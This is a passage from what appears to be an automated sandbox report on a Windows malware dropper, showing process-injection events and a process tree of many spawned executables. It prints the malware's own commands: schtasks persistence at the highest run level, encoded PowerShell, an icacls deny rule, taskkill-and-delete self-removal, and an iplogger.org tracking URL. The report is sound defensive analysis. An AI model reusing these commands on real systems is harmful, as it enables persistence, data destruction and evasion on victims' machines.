PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3620 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 4196 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
PID 4196 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
PID 4196 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
PID 4196 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe
PID 4196 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe
PID 4196 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe
PID 4196 wrote to memory of 4052 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe
PID 4196 wrote to memory of 4052 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe
PID 4196 wrote to memory of 4052 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe
PID 4196 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe
PID 4196 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe
PID 4196 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe
PID 4196 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe
PID 4196 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe
PID 4196 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe
PID 4196 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
PID 4196 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
PID 4196 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
PID 4196 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe
PID 4196 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe
PID 4196 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe
PID 4196 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe
PID 4196 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe
PID 4196 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe
PID 4196 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
PID 4196 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
PID 4196 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
PID 4196 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
PID 4196 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
PID 4196 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
PID 4196 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
PID 4196 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
PID 4196 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
PID 4196 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe
PID 4196 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe
PID 4196 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe
PID 4196 wrote to memory of 4040 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe
PID 4196 wrote to memory of 4040 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe
PID 4196 wrote to memory of 4040 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe
PID 4196 wrote to memory of 4316 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe
PID 4196 wrote to memory of 4316 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe
PID 4196 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe
PID 4196 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe
PID 4196 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe
PID 4196 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
PID 4196 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
PID 4196 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe
PID 4196 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe
PID 4196 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe
PID 4196 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe
PID 2520 wrote to memory of 2020 N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
PID 2520 wrote to memory of 2020 N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
PID 2520 wrote to memory of 2020 N/A C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe
PID 4316 wrote to memory of 4960 N/A C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe

"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"

C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe

"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"

C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe

"C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"

C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe

"C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe"

C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe

"C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe"

C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe

"C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe"

C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe

"C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe"

C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe

"C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"

C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe

"C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe"

C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe

"C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe"

C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe

"C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"

C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe

"C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"

C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe

"C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe"

C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe

"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"

C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe

"C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe"

C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe

"C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe"

C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe

"C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe"

C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe

"C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -?

C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe

"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"

C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe

"C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE

C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe

"C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1216 -ip 1216

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SysWOW64\cmd.exe

cmd /c cmd < Inebriarti.htm & ping -n 5 localhost

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAAwAA==

C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe

"C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe"

C:\Windows\SysWOW64\control.exe

"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 452

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1216 -ip 1216

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 764

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe

"C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1216 -ip 1216

C:\Users\Admin\AppData\Local\Temp\M52CB.exe

"C:\Users\Admin\AppData\Local\Temp\M52CB.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 772

C:\Users\Admin\AppData\Local\Temp\M52CB.exe

"C:\Users\Admin\AppData\Local\Temp\M52CB.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1216 -ip 1216

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 816

C:\Users\Admin\AppData\Local\Temp\0BB4J.exe

"C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1216 -ip 1216

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 824

C:\Users\Admin\AppData\Local\Temp\0BB4J.exe

"C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1216 -ip 1216

C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe

"C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 956

C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe

"C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1216 -ip 1216

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1016

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im l2S7FrWODIlvtiOh9PM4XNlS.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2284 -ip 2284

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 1556

C:\Users\Admin\AppData\Local\Temp\EH46E.exe

"C:\Users\Admin\AppData\Local\Temp\EH46E.exe"

C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe

"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe

https://iplogger.org/1x5az7

C:\Windows\SysWOW64\taskkill.exe

taskkill /im l2S7FrWODIlvtiOh9PM4XNlS.exe /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1216 -ip 1216

C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe

"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1744 -ip 1744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 2068

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Kog456fPoi_qlj0gOuQ1ue72.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe" & exit

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Kog456fPoi_qlj0gOuQ1ue72.exe" /f

C:\Windows\SysWOW64\regsvr32.exe

